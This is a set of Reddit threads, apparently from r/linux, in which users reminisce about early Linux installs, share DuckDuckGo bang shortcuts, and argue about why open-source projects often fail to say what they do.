My first install, it was Slackware 3.4 (circa 1997).  A friend had bought a 4 CD archive set from Walnut Creek CDROM, including a mirror of software from the Sunsite FTP mirror.  My BIOS in my PC at the time didn't know how to boot from CD, however.  I ended up using rawrite on 99 floppies, and checksumming all of them for consistency to do my first Linux install.

I had no idea what to do with it once I got it installed.  It was like being dumped into this alien environment where DOS commands wouldn't work.  Read a few books on Unix, and got a [printed copy of TLDP](http://www.amazon.com/Linux-Undercover-Secrets-Revealed-Documentation/dp/1888172053) to study.

I don't really recall any long-term dealbreaker hardware problems  Encountered many software bugs, which I've reported to maintainers or helped fix.  A lot of classmates and even a few professors mocked me for using something different throughout my undergraduate studies.  Made a pretty good living working on Linux since, however.
ITT: people who don't like to let MS/apple do their computing for them.
I'm still working up the resolve to put together my first arch install.
Damn, son, you're tellin' me. I remember the old days of keeping a copy of Tulip on a floppy drive, because that was the only network driver that would work at the time and wasn't included for default desktops. 
I remember when I first started using Linux in 2004.  It was Fedora Core 1 and it took me nearly a week to get it to boot from my external harddrive.  Part of the problem is in order to get it to work I had to boot to disk that was at least 2MB in size (bigger than your normal disk) due to needing USB mass storage drivers and then alter something (probably installing those drivers).  So I had to write a CD that was a 2.88MB bootable disk image.  There were lots of other problems as well after that but I don't recall what they were.  I'm now using Fedora 20.
We use Dialogic cards and old US Robotics modems that we test with minicom when they fail.

I have yet to reach modern linux at an enterprise level. :( RHEL 4 is latest and greatest in our environment... rumor has it dev is working on RHEL 5 releases...
Whenever redhat 7.3 came out is when I made the jump. I remember installing Gentoo soon after and having a couple papers covered both sides with the commands I had to type to get it installed properly.
2001 here. Hardware support was fairly decent at the time. But there was "dependency hell" installing downloaded or compiled apps most of the time lol. Dialup was hardware modem only. Heard you could get "winmodems" working but I forked out the cash to save a week of headaches. Better off getting a disk set and installing apps at the install of the OS. No open gl and such back then for good video cards. About had an orgasm on myself when Nvidia and ATI started releasing Linux drivers. 

I dual booted until about 2 years ago when I gave up Windows entirely. 
Linux desktop and server and laptop user since kernel 1.2.13 here. 

You don't owe it to us. You owe it to all of the proprietary monstrous pieces of crap that existed with Linux. It's not like we had much choice except the bsds.  It was that or watch our data be locked into proprietary buckets that were considered old and therefore "obsolete". 
winmodems were the bane of my existence. 
You just reminded me of the huge disappointment I had in the late 90s with redhat and a win modem. 

Slackware on disks ftw! 
I don't remember it being bad...  Like today, you get what you pay for in computer hardware.  You STILL need to have a decent motherboard with a decent video card, and NIC made by a real company.

I suppose that you can get buy today without knowing how your computer works.  I think of that the same way I think about driving around in a car that uses a braking system you don't understand: you are asking for trouble.

The bad-old-days are called Solaris/AIX/HPUX/etc.  
Same goes to those that stick to FSF-endorsed, zero-nonfree-blobs-included distros, and are actually working to make free software replacements to all those drivers we're currently depending on.
My first experience with linux waa the Mechwarrior hack for the first Xbox. I was probably 12 at the time and let me tell you, that was an eye opener.
2005, I didn't have too much to deal with. Soundcard issues and a few other nitpicks but they smoothed out quickly over the years honestly.
Still have tons of hardware problems.

Linux really isn't an OS if you want to buy the newest stuff. You have to wait for someone else to test the waters first. I got burned again on my thinkpad and the OS just doesn't work well.
I still do things the same way I did way back when.  e.g.  launch X within a screen session, pipe gzip into tar, create a usermode environment so I don't get clobbered by the then everchanging HFS (still happens), and create 4 identical partitions with different file systems in hopes one remains intact when a massive bug goes undiscovered for a long time. (Last time was 2009, not long ago.)
Since 2011 in Linux. Great job by the community, developers and of course, Linus Torvalds. I just can't seem to switch to another OS which can be so much powerful.
1993 - 
* horzontal and vertical sync rate if your monitor ..  probe your montor - you'll possibly blow it up .. fuck my life. 
**[software freedom intensifies]**
Last time I used linux for desktop was 1999 and [today](http://www.reddit.com/r/linuxmint/comments/26irto/im_lost_with_broadcom_wireless/) I'm still experiencing the same problems...Now I understand it's Broadcom's fault, but it's still a problem.
we owe a lot of modern OS concepts to these people. Windows and OSX do tend to adopt the good ideas that come from the Linux circle
I wish i could contribue with free software community...some how.
Thank All u veterans, who work hard making driver in C, think was tough!
Thnaks!
Started in 2006 myself. Even then there was too much hacking of config files required to get things going properly. Linux has come a long way even since then and I won't go back to Windows for everyday computing. Of course from time to time there are still annoyances, but far less than with Windows...
I started in 2011 with Ubuntu 10.04, since then moved to Arch
On and off user myself, indeed we do have to thank them with ATI and Nvidia now bowing to pressure to develope kits for linux driver developments 
User since 1996 learning back then paid off. 
It wasn't easy, but having to compile your kernel with modules and rebuild binaries in order to play Quake with 3DFX in Linux was its own reward.
Running Linux as the native OS at work using wine to run Lotus Notes and using samba to mount remote Windows shares was amazing.

Thank you, no problem just like a few i have been there since 1994 also like some.. very hard complex times i even recall installing it via floppy disc., can you picture installing a dvds worth to a bluerays worth lol 
Since 2000 here, my main problem was video graphic card and printer, those year I had a Xerox DocuPrint C3, it took me months to configure correctly CUPS for printing, my prints always has margin errors, because of page sizes. Afterwards my main problem was the graphics, I remember to broke X so many times, actually back then I didn't know how to restore to defaults (aka backup conf files) and my solution was reinstall the whole system. Compile the kernel with the correct drivers for my PC was the risky thing I've done in my entire life.
Just installed Arch on Alienware laptop. And everything works! Even the AlienFX lights. Kudos Linux community!
I've been using Linux since 1997 or so. Never had problems getting hardware to work. Not even sound, which could be a challenge back in the day. 
This is what I loved about the early Ubuntu releases. Every release (in a 6 month cycle) there was a significant and noticable improvement over the previous version. Not just on drivers but also software, bugs etc.

Looking at it afterwards makes it sound like it was rather terrible early, but in 5.10 or 6.06 I had said that's as good as Windows XP was.
It's great to play with. And Android wouldn't be what it is today without *nix.


But the desktop I've tried multiple distros on just is not compatible. Something with Nvidia graphics just renders the machine unusable. Granted, it's an aged motherboard.


For my desktop, I started with Warty Warthog back in '04.  Somewhere along the way I began witching between Debian and OpenSUSE until about '10.  Then I switched to Arch, and I'll never choose another distro again.
For those that are unaware, DuckDuckGo has something called bangs that make browsing much faster. For example, if you want Rome's Wikipedia page, you can search for "!w Rome" and it will bring you there. When I wanted to come to this subreddit, I searched for "!rsub linux" and it brought me here.

They also have many bangs for Linux related websites. For example, they have "!aw" for the Arch Wiki, so searching for "!aw bluetooth" brings me to the Arch Wiki page on bluetooth. Earlier I searched for "!nixopt plex" and it brought me to a list of all options NixOS has for Plex.

They have a page for [tech related bangs](https://duckduckgo.com/bang?c=Tech) which also shows some subpages for different Linux distros.

You can see all of the Debian related bangs [here](https://duckduckgo.com/bang?c=Tech&sc=Sysadmin+(Debian)), all of the Fedora related bangs [here](https://duckduckgo.com/bang?c=Tech&sc=Sysadmin+(Fedora)), etc.

At this point, I would say that a majority of my searches on DDG involve bangs because I generally know what I am looking for and where I need to go. So I figured that some fellow Linux users would be interested in learning about them.
!pacman and !emerge search packages for arch and gentoo
I really like the way Firefox handles this: you can assign shortcuts to any search engine so I can type "gv somequery" in the address bar for Google Verbatim and "g3m ..." for Google limited to the last three months (hard to do in their UI). And you can make these search engines by editing a bookmark so it's easy to do custom ones, eg. I have "f" set up to search github for a specific organisation.

There is one piece in my workflow that was missing from the browser though: I often want to start on DDG or similar privacy-respecting general search engine and only switch to something else if it doesn't work out for me. But I don't want to type the query again. So I made a (tiny) extension so I can go "sa gv" eg. "search again with Google Verbatim".

[https://addons.mozilla.org/en-US/firefox/addon/search-again/](https://addons.mozilla.org/en-US/firefox/addon/search-again/)

While I'd be happy if someone used it, I'm fine if they don't and no one likes self promotion so I never bothered to post it anywhere until now and had to use a throwaway since I'd be doxing myself as it suspiciously has exactly one user.

Edit: yes, it needed that extra permission in 2018 but there is now a way to do it without that, I just haven't gotten to it yet, nor putting up a git repo... in  the meantime, it's a single 34 line non-obfuscated .js  file and the .xpi is actually just a zip file so the source is still available for perusal, just not quite so easily linked to
That’s pretty cool.
Damn that makes me wanna consider switching to DDG. That's really nifty. Yeah I'm like you here from the sounds of it: generally I know what site I wanna use/where the information I'm searching for it. Typing the search is just a convenient thing for pulling up the proper website. I might spend some time playing with it over the weekend

Yeah you can select search engines in Firefox but I do like the idea of just having text shortcuts, would feel less clunky.
Don't forget the duckduckgo page devoted to bangs (scroll 2/3 down):

https://duckduckgo.com/bang
For Arch, there's also !apkg for packages and !aur for AUR packages
I remember when I was first told about DuckDuckGo, loved the idea but I didn't switch (Not for lack of trying) because I found the results to be inferior to Google and at the time, the privacy stuff didn't seem as egregious. 

Nowadays, it's the opposite: I type say, the title of a movie, game or song into Google hoping to get a Wiki, PCGW, decent lyrics site, etc as my result, but instead get the various websites that you instantly suspect have some kinda agreement to appear higher in results and don't really offer you the information you're looking for. (eg. If I'm trying to figure out which version of Unreal Engine a game uses, I don't want the official page, Kotaku, IGN, etc style results, I'm probably happy with just Wikipedia or the games Wikia.)

I had no idea about this feature before, but this just makes it even better on DDGs side of things...I've only just found about it and I'm already astounded at how much easier I'm going to find searching in future.
I've been consistently using DDG for web searches. Whenever I need to use Google (10%~20% of the time, because let's face it, DDG is not as good), I can simply insert "g!" to the start of my query.
`!steam` is a great bang too. I use that a lot.
There are a lot others, related to programming in general. 
Such as !rust to check for a specific in rust docs, !cpp for c++ and a lot like this. 
Duckduckgo is very handy for stuff like these. 

Search with a bang ;D
Thank you for teaching me about !nixopt
Upvoted for unexpected NixOS
I’m new to Linux(Parrot Sec) and every day I learn a new cool feature. More people need Linux in their lives.
[deleted]
I love you
Ou can also make such shortcuts directly in your address bar in Firefox
I like them, but I would prefer it if this behaviour was handeled by firefox (or an addon). Switching through multiple "search engines" using by using a bang is easier than having to select them.
Those aren't even comprehensive. The DDG supports a Rust bang but it isn't listed here.
Holy shit, been using short bangs for a while and never knew of !rsub, thanks.
That is a great feature
Pretty interesting, cool share
Holy shoot. Typed `?!rsub linux` into Whisker Menu from desktop and shot me right to this sub. Amazing!
If you want to search the void Linux repos !xbps works too.
They are in the path to become the best search engine ever.
I use !gentoo and !emerge a lot, and sometimes !arch
WOW! This is insane. I am using qutebrowser so for opening a new tab i use the shortcut shift+o, then i type in the site or a DDG search text. With those "bangs" i can now simply do this:

shift+o+!archwiki <term>

this is awesome, i had the archwiki bookmarked but no reason for that anymore. Thanks a lot!
Also, / to focus the search bar.
!jso - java questions on stackoverflow I'm dying X-D
<packagename> archlinux and <packagename> aur list packages on the top of the page (google hummingbird like)
https://imgur.com/kCRnNap
[https://duckduckgo.com/bang?c=Tech&sc=Languages+(Java)](https://duckduckgo.com/bang?c=Tech&sc=Languages+(Java)) and then:

jQuery docs: !jquery
Yeah, bangs are so helpful. Plus, if you find there's one missing you want to add, it's [super easy](https://duckduckgo.com/newbang) to submit one yourself.
I tried to use DuckDuckGo in the past and I found it slower than Google, and that's why I stopped using it. Is it just me?
> ... "!rsub linux"...

I've been using !reddits for months and didn't know that a shorter version existed. Thanks for the tip!
duckduckgo bangs, what a beautiful idea.
[:\)](https://i.imgur.com/H4jBG2h.png)
!ctan is damn useful. Frankly if I'm unsure I just guess a hashbang. Works better than you'd expect.
I mean... that;s great and all, but why? If I know I want to find something on archwiki or whatever, I'll go straight there. If I don;t know where i'm looking for something I use a a search engine. Having to learn to use all these bangs is another thing to learn  rather than just a web address, or I need to look up the correct bang which is slower than just searching more generally, or even just searching and adding the name of the website!
also !oldreddit will search reddit using the good old interface.
Oh wow this is pretty cool
I had no idea, that's pretty useful!
Came here to say DDG is the modern tech chad's search engine.
> For example, if you want Rome's Wikipedia page, you can search for "!w Rome" and it will bring you there. When I wanted to come to this subreddit, I searched for "!rsub linux" and it brought me here.

Seems like a less generic way than browser search shortcuts.
E. g. in Firefox, just assign a “tag” to a bookmark and substitute
``%s`` in the URL where the search term goes. No website
intermediate required.
You normies using DuckDuckGo...you should use Searx on your own server through VPN like a chad...
A statement of function that says something as simple as:

"This is xyz. It is a driver/script/widget that does blah. It was started in 1862 and the latest release was on 1 September 2019.”

I've lost track of the number of projects that just assume that you know what their reason for existence is.
A single screenshot of the program would be nice too. Too many damn GUI projects have no screenshots at all.

I don't understand why.
Even better when they tell you all kinds of info, like what framework and language it is written in, who it is named after, and what kind of beer the main author likes. But nothing about the intended purpose or why it's better than the competition.
I don't know why but all I can think about is Apache Camel, the only piece of software I know of that links directly to Stack Overflow to help describe it [https://stackoverflow.com/questions/8845186/what-exactly-is-apache-camel](https://stackoverflow.com/questions/8845186/what-exactly-is-apache-camel) 

 

>What is Camel?  
>  
>  
>  
>Apache Camel ™ is a versatile open-source integration framework based on known [Enterprise Integration Patterns](https://camel.apache.org/manual/latest/enterprise-integration-patterns.html).
OSS projects don't have marketing departments, and that type of thing isn't usually the itch OSS devs are trying to scratch.

100% agree with you, though. It's especially infuriating when people post on /r/linux things like "GDCP has released version 0.0.3! This is a huge milestone! Congrats to the team!!!!!!!" and after 10 minutes of searching the website I still have no idea what the project actually does.

This could be a low entry way to contribute to a project, though..."Hey I noticed you don't have a project summary that could help explain how it might be useful. Here's a 1 paragraph description I wrote about your project that can go in a readme or on your site."
sometimes again when open source projects have their own web pages, they often concentrate on oddly specific things about the software and go without explaining important major points of the functionality because of that.

for example, i wandered onto network video recorder software's site. its introduction made a huge fuzz about how it was written in sexy language (author's opinion) and the introduction was more about what libraries etc. it uses and no information for example on its intended target platform, software/hardware requirements and so on.
Short answer is devs aren't technical writers.

I agree with you, it's annoying.
Most projects at least have a brief readme, but it's almost always written from an insider's perspective and tends not to be particularly helpful.. I don't think this is really out of laziness or malice, it's just that it's actually quite difficult to look at a project you're completely immersed in from the perspective of an outsider who knows nothing about it. Trying to think outside of your own experience and write a good introduction to a technical topic is a skill that takes time to develop. And of course, people generally don't write code because they're interested in developing their writing skills.
My company has implemented a library like this and we've actually offered to pay the single author to maintain and better document his code since we have implemented it so heavily into our system, he politely declined stating he had moved on to better things.
Open source developers, please: [https://github.com/ddbeck/readme-checklist/blob/master/checklist.md](https://github.com/ddbeck/readme-checklist/blob/master/checklist.md)
Or when something specifies that XXX project's official website is YYY.org, but then YYY is apparently a company/team/guy/whatever that made many multiple things, and now you have to scavenge across their website looking for any useful mention of XXX.

In many cases isn't a problem with the projects themselves, but more with the links themselves that get written into repo packages or whereever else.

Although when the website itself doesn't give a clear singular page referring to a specific singular project/package, can't blame the packager for not including a good link because there's just ain't one!
I worked for large software company that wrote proprietary closed source software and a lot of that code was just as bad if not worse than open source code.   As a general rule documenting code is boring work most people don't enjoy.  Get things working is the most important.  So, documenting often gets ignored.   People would periodically complain to me about my code not being documented enough and I was often surprised people couldn't understand code  I assumed was obvious and simple.  So, another reason is programmers often don't realizes how confusing their code is to people that didn't write it.
I looked through my firefox tabs for open source projects, and found that 5/6 projects had their function/purpose right in their github readme on the main page.

I suspect you are either looking at projects/scripts that aren't made by people that intend to make it a big public project (e.g. just putting their work up for the public to view and use, but without any intention of actually working on it), or you may only be remembering those projects that follow your hypothesis (a flaw pretty much everyone has to some degree).

What types of projects are you looking at?
it used to be mostly people writing little utilities/apps for themselves and then putting the code up for other folks out of courtesy, things only spread by word of mouth.

Their is no "open source community" their is just people doing what they feel like and mostly they consider the documentation and presentation boring, so it doesnt get done. When people work for free,  in their free time,  until they get bored of it, you get what you get.
What, you mean like this?

http://www.thedarkmod.com/main/

Seriously, great game. Open source, cross platform, mod friendly (literally designed for user generated content, with 150+ missions ready to play). But no clear description of how the game plays right on the front page.
The most infuriating thing for me is when I'm searching for vim themes and there is no god damn screenshots of it.

I mean, c'mon guys. How am I supposed to know how the theme looks like without a f'ing screenshot??
Manual pages that don't describe the format of the output. What do all those abbreviations, acronyms, and columns mean?
It's just your confirmation bias at play. Most libs, frameworks or software I use actually says what it's there for. 

When I do come across something that doesn't, I remember it well on that day because it's an important part of my project. 

So it's definitely not a "universal" fact.
YAUOS

Yet Another Undocumented Open Source
Not sure that's and open source (of which only BSD L qualifies ;-) ) problem.

&#x200B;

Just an asshat problem.

&#x200B;

Happens in paid for projects just as much. If not more.
This is a blight that affects all facets of open source.  I'm someone who 'reads the code' and the lack of the absolute minimum of commenting is appalling.  Authors can add 20 lines of copyright/licensing information but can't add a single line to describe what the code in the file does, what their contact address is, or even where the source is hosted.

And don't get me started on function comments.  Things like describing what a function does, what the input values mean, what the return values are, what error conditions occur, or a brief description of the internal logic.  This is basic stuff that separates professionals coders from amateur hacks.

Inline comments describing the purpose of variables or a block of code are so rare that I think most OSS authors don't even know they have been part of the syntax of every single programming language ever.
>I've lost track of the number of projects that just assume that you know what their reason for existence is.

If the reason is not written in the readme, assume it exists because the author needed that code but doesn't care enough to maintain it
The best is when you get on the forums and ask how to do XYZ only to have a senior member chew you out about how this question has been asked and answered a hundred times before, and if you weren't so lazy, you could just read the docs and blah blah blah.  In the meantime, you did read the docs.  They're contradictory, incomplete, outdated, missing, incomprehensible, or just downright incorrect.
Your premise is incorrect.  Lots of them do.

Here's one:  https://okular.kde.org

The heading for the first paragraph is literally "What is it?"
xyzzapinator - zap away all those turdles from your xyzzy server
Because engineers would rather be creating than documenting. It's one part lack of writing skill, one part lack of marketing.
Do you have an example (better 2-3 examples) of such a project? :\\
I agree.  Absolutely infuriating sometimes.
Wow I thought I was the only one that noticed that.  Yeah it bugs me too.  Worse is projects that just throw you on a github page with no other details or info whatsoever.
The short blurb at the top of `man xyz` does exactly this.

So you do not need a website, a repository, a page, notes whatever, iff they have a man page.
Everyone, drop what you are doing right now, go over all of your Git repos, and make sure the README is formatted like this :

* project name
* specify one of: script to be run in X shell/REPL, library for X programming language, plug-in for X application, command line application for XYZ operating systems, GUI application or game for XYZ operating systems, a server for XYZ operating systems
* what it does (max 1 sentence, 40 words), link to Wikipedia article about the problem it solves.
* why you made it (max 1 sentence, 40 words), links to similar software
* 1-sentence overview of how to build and install, and a reference to installation instructions if any.
* software license
* date project staryed, latest stable version
* screen grabs for GUI applications, log output for servers, code examples for anything else.

Do it right now.
Reading some of the Linux man pages is my horror. I'm there because I want to learn, but it sometimes seems like an explanation for someone who already knows and just checking whether that flag is the uppercase or lowercase one.
Part of it, perhaps, is that people generally get their software from a distro repository, not from a website.
So many OSS website has outdated screenshots, this is very annoying.
"I spent four months of my life on this project, wtf, you expect me to write a single elevator pitch too? No thanks, I'd rather spend my time making an *impact.*" 

"Why do none of my projects have over 5 stars?"
No one likes writing documentation, that's why.
A lot of “open source” projects are people just dumping code written in their spare time. Any further effort than that is usually too much to ask.

Sometimes it’s just to demonstrate to recruiters that they can code and know big words, in which case it makes sense the readme doesn’t help you actually use it.
Yes, I see announcements all the time for updates of products and when I go to the website in question, I can discover all sorts of stuff about the item except what it actually does.
Because may times the code is simply tossed over a wall. The developers either don't have time, or don't care about documenting it.
I work at an open-source company, and my specific job is to write documentation that makes adoption of the software easy to use -- i.e. to NOT do the mistakes you listed.

Please let me know if I'm failing/succeeding! 

[https://developers.komodoplatform.com](https://developers.komodoplatform.com) :)

If I may be so bold as to answer your question as well:

In an open-source environment, resources are generally clustered around developers. There are few, if any, designers (both visual and UX/UI), writers, and team managers.

Developers have to become so closely connected with their code, they frequently forget about the experience of a new user for the software. Consequently, developers frequently write technical documentation (with very little time available) that speaks only to the people with whom they communicate on a regular basis. The developers are speaking to the testers, and to the users in their ecosystem who have such a high need for the software provided the users don't mind wading through massive levels of confusion to discover how the software works.

The general effect is that the presentation of the open-source software struggles to convey the software's potential. 

I spent many years as a book cover artist, and one thing anyone in the publishing industry can tell is that while you can't judge a book by its cover, the creator(s) of the book should assume that the book will be judged by its cover anyway.

As open-source software becomes more common, I personally suspect that communication standards will continue to improve, purely out of necessity. Open-source projects that spend resources to curate and improve their presentation skills will likely attract a wider audience, and thereby attract larger supporting resources.

There's my two bits. :)
yeah, some highly technical projects have no introduction whatsoever.

i think most people assume you've been with them from day1.
Not sure where you expect to find it, but normally that “statement
of function” exists in the manual:

    LS(1)                       User Commands                     LS(1)
    
    NAME
           ls - list directory contents

Also, if you ever worked with proprietary code you’ll notice it’s
even worse. Case in point: for most components of our
codebase at work the reference manual is still whatever the
guy that wrote a piece of years ago is able to recollect.
It always makes me sad when people don't document their work, at least stating what a thing does. 

They invested their time and felt the need to share their software with the world. Yet, if nobody knows or remembers how to use the software then this good intention is just wasted effort.

Same goes for some software inside companies. What does it do? How does it work? Someone got paid to do it, but in the end it's a waste. I threw away so many scripts and libraries because of poor documentation....
    $ man ls
    LS(1)                                                              User Commands                                                              LS(1)
    
    NAME
           ls - list directory contents
    ...
    $ apt-cache show sed | grep Description-en -A 4
    Description-en: GNU stream editor for filtering/transforming text
     sed reads the specified files or the standard input if no
     files are specified, makes editing changes according to a
     list of commands, and writes the results to the standard
     output.
I get a little bit of anxiety when I see how many packages I have installed that are dependencies of other packages, but I have no idea what on earth they do.
I think it's a asymmetrical knowledge problem.  The developers are keenly aware of what the software does but potential user may have no idea, based on a clever name that has no obvious relationship to the primary function. Commercial software has a marketing department to bridge the gap.
The naming convention of some applications or services seems to be intentionally obtuse. 

Akonadi anyone? - without any prior knowledge, would you have any clue what this was or did?
It's so bad that if a software doesn't have a Wikipedia page or a readme markdown on GitHub, I won't look at it. By default, I assume the product website is insulting and uninformative.
Seems like something you could remedy with a PR...
cause it keeps NORMIIESSS REEEEEEEEEEEEEEEEEE 

out
True. I usually search wikipedia for the name of the project
Here's a readme that satisfies this: [https://github.com/mudlet/mudlet](https://github.com/mudlet/mudlet) :)
[deleted]
Because that is documentation.  
And what do we with documentation? Hate it and tell people that the code is it is own documentation.
The problem with open source is that most of it has no requirements whatsoever. In proprietary world there has to be technical documentation, javadoc and bussiness documentation explaining everything. Open source, as good as it is, is a place where developers can write "just code" and have no incentive to do any documentation.
Well its normally in the README. If you care so much about it send a pull request to include one after figuring it out!

Remember this is mostly run by people who are doing their own stuff and just happen to mostly dump it on the internet in case its useful for others.
That sounds like a project description you get on every Github repo and distribution package.
grep it till you grok it
I've found this much improved since Github and the like arrived. Most projects have a relatively helpful readme.md these days.
I don't know what OSS you are using but I went to github and most/all (I only checked the first  10 projects) had succinct descriptions at the beginning of the readme doc.

Do you have examples of where they do not give a description.
And at least when using gnome I have no idea what's the program I'm using is called! "Ok menu entry is for file browser, I wonder what I have to kill to disconnect hanged samba connections.."

Ffs why can't you add a menu entry in the app for help to show the version number, program name and homepage maybe? I've been using linux for fifteen years and this frustrates me sometimes more than it should.
Because a lot of open source is done by companies these days and companies can't resist slipping back into marketspeak. "We just open-sourced Dirtferret, our B2B platform that gives you visibility into your SaaS value-adds!" And it turns out to be a reporting dashboard that instruments web APIs and counts API calls or something. Companies do this because they don't want to commit to anything specific. They want to leave the door open to "innovate", so in case their grand vision flops this quarter they can pivot to another grand vision easily enough without having to print up new mission statements, employee pamphlets, pens, mugs, and water bottles. I ran into this when job searching. The recruiter goes: "Did you check out the company's web site before your phone screen?" And I go: "Yes, and it said 'Bongolox provides best-in-class services to help cultural creatives connect with value in the cloud.' But what do they actually _do_? And what specific product is the job opening for?"
Do you have a list of applications you feel are under documented? I am sure that myself and other community members would be happy to submit Issues/PRs to rectify that problem.
It's because it's written by coders, who are looking at the software from the inside out. Users need it explained from the outside in, which is why tech writers like me exist. But any non-coder who volunteers to help with documentation is told that no one has time to answer questions, so they should figure it out themselves. 

I (20+ years experience) am not going to learn to code just so I can do unpaid work. I can read some code and figure out a lot on my own, but I need at least a few questions answered and someone to review and verify I've got it right. I've been greeted with incredulity that I would expect such assistance. People in open source projects have been so rude and dismissive that it's really turned me off the idea.

But hey, code monkeys, you just go on believing that tech writers are unnecessary. Don't waste your valuable time listening to what users want. Who cares about those idiots, right? If they *really* wanted to use your software they'd learn to read the code to find out what it does! Clearly they are unworthy.
I'm a dev. Hey, fuck writing docs, I prefer code. I made the code and contributed it so you could have it and use it for FREE. The least y'all could do is write some docs, as you're ~~using it~~ *benefitting from it* (and often solving business problems with it), or not bitch that I took my limited time to make something in the first place that you find hard to use. 

Do like that? Tough shit, don't use it. Or fork it. Or, better yet, take the 15 mins out of your day to improve it. Or actually fucking pay someone to make it, and document it. 

Get it now?
I don't think so, dude. I've packaged software for distros for over 15 years and I've rarely if ever had a problem finding a blurb on the project's webpage providing this kind of synopsis.
I honestly have no idea what you mean. Every open source program I've come across seems extremely well documented. Can you give an example?
I wish I could upvote this 100 times.
While [these](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/) are specific to Red Hat, much of them will apply to any Linux distro and it's components. They are very professional and polished.
My most annoying example is GNU Hyperbole, a pakage of emacs. There is a whole intro page and I couldn't understand what hypertextual and button means in that context.
This is less of an issue these days, but what bugs me are websites for software that don't make it obvious how to actually download the software. They tell you all about it, but the link will be hidden on some obscure page so you have to hunt all over the website to find it.
Makeareadme.com preaches the same.
Amen!
What difference does that make?
This is often true of smaller and specialized software, but not the larger projects or those targeted at less skilled users. 

The large projects like GIMP, LibreOffice, Firefox, and MariaDB explain themselves nicely. So do the smaller ones like FVWM-Crystal that are focused on the shell and improving aesthetics.

The ones I've seen that don't at least are either tiny or primarily targeted at other developers for inclusion in other programs.
Also the majority of Open Source things websites are from the stone age era :/
I can’t stand it when man pages don’t even offer common examples of how to use their program/commands either. I guess newbies just have to go scrounge info off the internet (like Stackoverflow). Can’t there be a page dedicated for this kind of info, or good examples provided with various flags?
It's pretty crazy to complain about projects created for the public primarily by unpaid volunteers. If you think it would be nice to have a single paragraph description of a project, why not do the research and write it yourself? Open source developers aren't all excited about writing ad copy, or even documentation.
Couldn't hit that upvote button harder.
check the about pages
This is a universal problem, it's also very common for proprietary software.
I think most people contribute to FOSS because they love coding. Explaining, making tutorials, answering people asking for support, is time-consuming and boring. But this is slowly improving, as some enthusiastic users get involved in this tedious but essential task.

When the Gimp G'mic plug-in was released, I kept repeating that someone should write a Windows installer instead of repeatedly answering the same questions about how to copy a file into the right folder. One morning I downloaded Inno Setup, learned how to use it and the first Windows installer for G'mic plug-in was available the next day. But writing tutorials, making screen captures, is yet less rewarding.
Try

man --usage (some Linux command)
Welcome to Hacker News.
We killed whole networks in the Quake 2. Changing skin to CON file name. Everyone had blue screen.
The software does not need your permission to exist. But at the same time yeah, I kind of agree. I miss freshmeat.org
Probably the same reason why so many subreddits doesn't have anything written on the sidebar about what that subreddit is about, it's either just nothing or rules, etc. So I'm guessing laziness.
That’s something that annoys me a lot with new projects recently.

I try to go into enough detail on my applications on both the GitHub readme and any site I end up creating for it. My latest project is one of those cases:

https://dfshow.op-ezy.co.uk
Use documentation quality as a filter. Surgeons law applies to FOSS too.
Not just "open source".  I've seen huge Enterprise-level solutions with big, professional-looking websites and supposedly tons of money and investors and other things thrown into it and I can't for the life of me figure out what it actually *does* until I go hit up some other site like Wikipedia and find out there.

Don't blame "open source" (Free software) when it is a problem common to all software.
man pages usually do include this but they you have projects that don't even create man pages.  Grrrrr.
Same here, like we have to do way more than that here at work, you'd like that for software they want to present as professional level theyd do something
Fortunately it's Hacktober.  Now would be a great time to submit pull requests to those projects you feel need better documentation.  ;)
I just had this problem the other day. There was a GitHub project with plenty of stars and even had screenshots, but the only description of it was "ArchLinux on WSL (Windows 10 FCU or later) based on wsldl". I didn't know what the fuck "WSL" was and googled it to learn it's the acronym for Windows Subsystem for Linux. Of course.

That's better than some projects though, however I think a reliance on acronyms for everything is still confusing. Even if some projects *do* have a description they still assume you already know the context of what they're doing.
i assume its because writing prose is a liberal arts skill that programmers find difficult :)
It's open source. Be the solution you want to see. Contributing to open source is rewarding and makes you feel like a good person. Even simple documentation fixes like adding a line to the README.md are valuable.
Because developers are too cool for the old Unix paradigm? Do one thing well.

> man thing
Can we stop having animated GIFs of the command running, too? I find those incredibly un-useful, and would find a simple copy / paste of the output to be more effective.

Nothing like waiting for a GIF to cycle so you can see what was typed...
man pages?!?
It used to be man pages for cli software but i really do not like the syntax, so I use help2man to make a generic man. I recently started to use the wiki pages that gitlab provides to the repository where you host the source code.
I think that many projects do not have home pages because they have to maintain it, but you can provide static html from wiki pages and even use code to update it with the gitlab api.
Personally I don't like doc tools that make your code be fill with weird notation. A good summary of features of a software I think could be possible with expressive test named like "should .." in like a TDD manner.
I think this is more a thing with older unix tools. These days, you usually find a clear statement of purpose at the top of the readme on github.
I just look at their git page. And websites were enough. Also, you probably first heard of the project along with its use, then you go download it. But yeah, that may be useful too.
Sounds like someone needs to do a bunch of PRs.
Holy fucking shit, i know!  Why? Why? WHY!?   - I've always thought the same.
Thank God for githubs readme pages.
man xyz usually has a paragraph with description, and in which case you should use it. But only for shell stuffs..
Yeah I never understood this either. I try to document as much as I can when writing programs, but it seems I'm alone in this endeavor.
Yeah, sometimes I see things posted with links and everything, then I spend the next 20 minutes trying to figure out what I'm looking at. It happens in the programming subs.
\^\^\^
I've always thought the same, mate. Some screenshots of current versions would be great too.
The documentation in and around BSD when compared to Linux is truly sublime. It's a known issue that Linux contributors are pretty poor at writing and maintaining decent documentation and help files / man pages.

As to why exactly, I don't know. Anyone?
Choosing Beggars
Just add it yourself......
Because you haven't filed an issue or submitted the pull request.
In the immortal words of our Lord and Saviour, Theo de Raadt, "the people who write code get to decide how they document it".
The ubuntu software service is pretty bad about that .  It's also pretty that GUI and names of the software have to be so un-user friendly (looking at you gimp and open office).  The reason I personally want them to be more just...fun to use as compared to Windows is to make it more  inviting.  And devs have a pretty bad thing about being defensive about their stuff to (looking at you WINE).  I for one  agree, that when you go to the documents, what does thing even do: it's a doodad that does a thingamabog . While amusingly smart alec, doesn't really help with if Achme Screen  Share is meant for Lets Play people to invite people to sit down and join in on playing a game of monoply or some starwars games together.
Why? Cause most of the time they're not getting paid to. When I'm getting paid I'll write api documentation, readmes, howtos, whatever.

When I'm not getting paid I'm gonna do the bare minimum to get it working for me, throw it on github and enjoy what's left of my leisure time, spend time with my family, etc. I don't want to write documentation.

That's the beauty of open source. You can read the source and write your own documentation, submit a pull request and it helps everybody.
Most OSS projects are happy to accept pull requests. If you do come across an instance of this and feel like writing a summary or taking a screenshot yourself for the readme, please do and contribute it as a PR! Rememeber also that many OSS projects are built by developers for their own use, so the business model isn't about advertising to new customers.

